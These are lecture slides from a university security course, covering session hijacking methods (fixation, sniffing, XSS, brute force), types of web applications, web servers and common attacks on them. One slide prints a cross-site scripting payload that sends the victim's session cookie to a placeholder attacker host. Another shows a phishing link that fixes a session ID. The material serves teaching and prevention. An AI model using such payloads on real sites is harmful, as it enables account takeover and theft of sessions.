Professional Documents
Culture Documents
1
Week 11
Session Hijacking
CP70044E @2023 2
Today’s agenda
CP70044E @2023 3
Recap-The 3-Way Handshake
• If the attacker can anticipate the next sequence and ACK number that Bob
will send, he/she will spoof Bob’s address and start communication with
the server.
CP70044E @2023
https://sectigostore.com/blog/session-hijacking-attacks-session-hijacking-explained/ 4
What is Session?
• Sessions act as a series of interactions between two devices.
CP70044E @2023
https://sectigostore.com/blog/session-hijacking-attacks-session-hijacking-explained/ 5
Session- Features
• Sessions remain active while the user remains logged in to the system.
• The session is destroyed when you log out, or after a set period of
inactivity on your end. At that point, the user’s data is deleted from the
allocated memory space.
• Session IDs are a key part of this process. They’re a string, usually random
and alpha-numeric.
• Depending on how the website is coded, you can find them in cookies,
URLs, and hidden fields of websites.
www.mywebsite.com/view/99D5953G6027693
• On an HTML page, a session ID may be stored as a hidden field:
• While Session IDs are quite useful, there are also potential security
problems associated with their use.
• If someone gets your session ID, they can essentially log in to your account
on that website.
• One common issue is that many sites generate session IDs based on
predictable variables like the current time or the user’s IP address, which
makes them easy for an attacker to determine.
• Another issue is that without SSL/TLS, they are transmitted in the open
and are susceptible to eavesdropping and can leave you exposed to session
hijacking. CP70044E @2023 7
What is Session Hijacking?
• Session hijacking refers to an attack
where an attacker takes over a valid
TCP communication session between
two computers
Brute Session
Force Sniffing
Cross-Site Session
Scripting Fixation
Malware
CP70044E @2023 9
Session Fixation
• This type of attack relies on website accepting session IDs from URLs,
most often via phishing attempts.
• For instance, an attacker emails a link to a targeted user that contains a
particular session ID. When the user clicks the link and logs in to the
website, the attacker will know what session ID that is being used.
• It can then be used to hijack the session.
https://sectigostore.com/blog/session-hijacking-attacks-session-hijacking-explained/
CP70044E @2023 10
Session Fixation- Example
• An attacker determines that http://www.unsafewebsite.com/ accepts
any session identifier and has no security validation.
• The attacker sends the victim a phishing email, saying “Hello Mark,
check out this new account feature from our bank.” The link directs the
victim to http://unsafewebsite.com/login?SID=123456.
• In this case, the attacker is attempting to fixate the session ID to
123456.
• The victim clicks on the link and the regular login screen pops up. The
victim logs on as normal.
• The attacker can now visit http://unsafewebsite.com/?SID=123456 and
have full access to the victim’s account.
CP70044E @2023 11
Session Sniffing
• When a hacker employs a packet sniffer, such as Wireshark, to intercept
and log packets as they flow across a network connection.
• Session cookies are part of this traffic, and session sniffing allows an
attacker to find and steal them.
• A common vulnerability that leaves a site open to session sniffing is
when SSL/TLS encryption is only used on login pages.
• Public Wi-Fi networks are especially vulnerable to this type of session
hijacking attack.
https://sectigostore.com/blog/session-hijacking-attacks-session-hijacking-explained/
CP70044E @2023 12
Cross-Site Scripting
• A cross-site scripting (XSS) attack fools http://www.yourbankswebsite.com/search?
the user’s machine into executing <script>location.href=’http://www.evilatta
malicious code. cker.com/hijacker.php?cookie=’+document.
• When the script runs, it lets the cookie;</script>
hacker steal the cookie.
• Here the document.cookie command
• Server or application vulnerabilities would read the current session cookie and
are exploited to inject client-side send it to the attacker via the
scripts (usually JavaScript) into location.href command.
webpages, leading the browser to
execute the code when it loads the
• This is a simplified example, and in a real-
compromised page.
world attack the link would most likely
employ character encoding and/or URL
• An example of a cross-site scripting shortening to hide the suspicious portions
attack to execute session hijacking of the link.
would be when an attacker sends out
emails with a special link to a known,
trusted website. CP70044E @2023 13
Malware
• Hackers design the malware to perform packet sniffing and set it to
specifically look for session cookies. When it finds one, it then steals it
and sends it to the attacker. The malware is basically carrying out an
automated session sniffing attack on the user.
CP70044E @2023 14
Brute Force
• A hacker can attempt to determine the session ID on their own.
• First, they can try to guess the session ID. This can be successful if the
session ID is based on an easily predictable variable such as the user’s
IP address or the current time or date.
CP70044E @2023 15
How to Prevent Session Hijacking
• Use HTTPS On Your Entire Site
• Use the Secure Cookie Flag
• Use Long and Random Session IDs
• Regenerate the Session ID After Login
• Change the Cookie Value
• Log Out When You’re Done
• Use Anti-Malware
• Do Not Accept Session IDs from GET/POST
Variables
• Destroy Suspicious Referrers
CP70044E @2023 16
WEB APPLICATIONS and WEB SERVER
CONCEPTS
CP70044E @2023 17
Web Application Most people often confuse web applications and websites.
https://www.shno.co/blog/web-application-examples
CP70044E @2023 18
Types of web applications
Static web
application
Dynamic
Progressive
web
Web Apps
application
Types of web
applications
Single-page
Portal Web
web
Apps
application
Animated
web
applications
CP70044E @2023 19
Static web application
• Static web apps appear to the clients the same
as they are stored on the server.
• Languages: HTML, JavaScript, etc.
• Animated objects, GIFs, videos.
• however, it is hard to make updates.
Example:
Professional
portfolios,
digital resumes.
https://www.gurutechnolabs.com/types-of-web-applications/
CP70044E @2023 20
Dynamic web application https://www.gurutechnolabs.com/types-of-web-applications/
CP70044E @2023 21
Single-Page web application
• Single-page apps make it easy for users to use a webpage smoothly.
• This happens because the webpage can quickly send and receive small
amounts of data, making everything work well together.
• Languages: HTML, CSS, PHP, ASP.NET, Perl, Python, etc.
https://www.gurutechnolabs.com/types-of-web-applications/
Example:
Gmail,
Paypal
CP70044E @2023 22
Multi-Page web application
• They are websites that consist of multiple interconnected pages, each
serving a specific purpose or presenting distinct content.
• Unlike single-page applications (SPAs), which load content dynamically
without full-page refreshes, multi-page applications navigate between
distinct URLs.
Example:
Amazon,
eBay
CP70044E @2023 23
https://www.gurutechnolabs.com/types-of-web-applications/
Animated web application
• Animated web applications are closely connected with FLASH
technology. By creating these types of web apps, you can represent
content by using various animated effects.
https://www.gurutechnolabs.com/types-of-web-applications/
CP70044E @2023 24
Portal web application
• It is one of its types of web apps in which various sections or categories
are accessible on the home page. Here, this page consists of various
details such as chats, emails, forums, user registration, etc.
https://www.gurutechnolabs.com/types-of-web-applications/
CP70044E @2023 25
Progressive web application
• Enable you to enhance the mobile web experience and provide your
services to users despite slow/bad internet connections.
https://www.gurutechnolabs.com/types-of-web-applications/
CP70044E @2023 26
How Web Applications Work
CP70044E @2023 27
Web Application Architecture
CP70044E @2023 28
Web Servers
• A web server is a computer that hosts web pages, making them
accessible online. When a user loads a site, the web server
will retrieve the relevant files and send them to the browser
so the user can interact with them.
• Web servers are differentiated by:
• Operating system support
• Server-side technologies
• Security models
• Client support
• Development tools
CP70044E @2023 29
How do Web Servers work?
• When someone wants to load a website, the browser will look for the web server hosting
the site’s files.
• To achieve this, the web browser translates the site’s domain name into an IP address via
the Domain Name System (DNS). If the site is frequently visited, the web browser will
search through its file cache.
• After finding the corresponding web server, the browser sends an HTTP request to
retrieve site content.
• The web server receives and processes the HTTP request through its HTTP server. Once
the HTTP server accepts the request, it will search through the database to obtain the
relevant data.
• Finally, the server returns the files to the web browser and delivers them to users.
https://www.hostinger.co.uk/tutorials/what-is-a-web-server
CP70044E @2023 30
HTTP request/response
• User of client machine types in a URL
client server
(Netscape) (Apache)
http://www.smallco.com/index.html
client server
(Netscape) (Apache)
192.22.107.5
CP70044E @2023 31
HTTP request/response
• Client connects to server using IP address and port
number
• NB port 80 is default
http://www.smallco.com/index.html
192.22.107.5
http://www.smallco.com/index.html
CP70044E @2023 32
Web server basics
• Server determines which file to send
client server
(Netscape) (Apache)
http://www.smallco.com/index.html
"index.html" is really
/etc/httpd/htdocs/index.html
HTTP/1.1 200 OK
client Content-type: text/html server
(Netscape) (Apache)
[contents of index.html]
http://www.smallco.com/index.html
CP70044E @2023 33
Web Server Features
• File logging. Log files track any events or activities a web server performs, such as
requests, security, and error logs.
• Authentication. It often involves asking web users to provide a username and password.
• Bandwidth limiting. Bandwidth limiting controls the speed of responses to ensure that a
network can deliver files smoothly.
• Storage space. It refers to the amount of disk space available to store files.
• Load balancing. The purpose of load balancing is to minimize response times and
prevent server overload.
• Uptime guarantee. Server uptime tracks how long a web server remains operational to
process requests and deliver files. It directly impacts a hosted website’s availability. The
industry standard is a 99.9% guarantee.
CP70044E @2023 34
Actors
• There are three types of individuals (actors) who will be interacting with a web
server.
Apache
HTTP NGINX
Server
IIS Lighttpd
CP70044E @2023 36
Apache Web Server
• A free and open-source web server used for many operating systems, including
Windows, Linux, and macOS. Apache is one of the most popular choices among
website owners, developers, and hosting providers, with a market share of over
31%.
• The modules supported by Apache include:
• Authentication
• SSL support
• TLS support
• PHP
• HTTP request filtering
CP70044E @2023 37
Internet Information Server (IIS)
• Developed by Microsoft, IIS is widely used in Windows operating
systems. It supports Active Server Pages (ASP), a server-side
scripting technology developed by Microsoft for creating dynamic
and interactive web applications.
CP70044E @2023 38
NGINX
• Initially designed only for HTTP web serving, this open-source
software now also serves as a reverse proxy, HTTP load balancer,
and email proxy. NGINX is known for its speed and ability to handle
multiple connections, making it suitable for high-traffic websites.
CP70044E @2023 39
Lighttpd
• A free and open-source web server software known for its fast data
processing with less CPU power. Lighttpd is also popular for its
small memory footprint, allowing the server to handle more
requests while maintaining responsiveness and performance.
CP70044E @2023 40
WEB SERVER ATTACKS
CP70044E @2023 41
DoS/DDoS Attacks
• Attackers may send numerous fake requests to the web
server which results in the web server crash or become
unavailable to the legitimate users.
CP70044E @2023 42
DNS Server Hijacking
• Attacker compromises the D N S server and changes the
D N S settings so that all the request coming toward the
target web server are redirected to their own malicious
server.
CP70044E @2023 43
Man-in-the-Middle/Sniffing Attack
• MITM attack allows an attacker to access sensitive
information by intercepting and altering communications
between an end-user and web servers.
• Attacker acts as a proxy such that all the communication
between the user and web server passes through him.
CP70044E @2023 44
Phishing Attacks
• Attacker tricks user to submit login details for a website that looks
legitimate, but it redirects it to the malicious website hosted on the
attacker web server.
• It steals the credentials entered and uses them to impersonate the
legitimate user with the website hosted on the legitimate target server.
• Attacker then can perform unauthorised or malicious operation with the
website target server.
CP70044E @2023 45
Summary
• Understanding of Session Hijacking Techniques
• Implementation of Session Hijacking Prevention Measures
CP70044E @2023 46
Thank you very much!
CP70044E @2023 47
See you next year
CP70044E @2023 48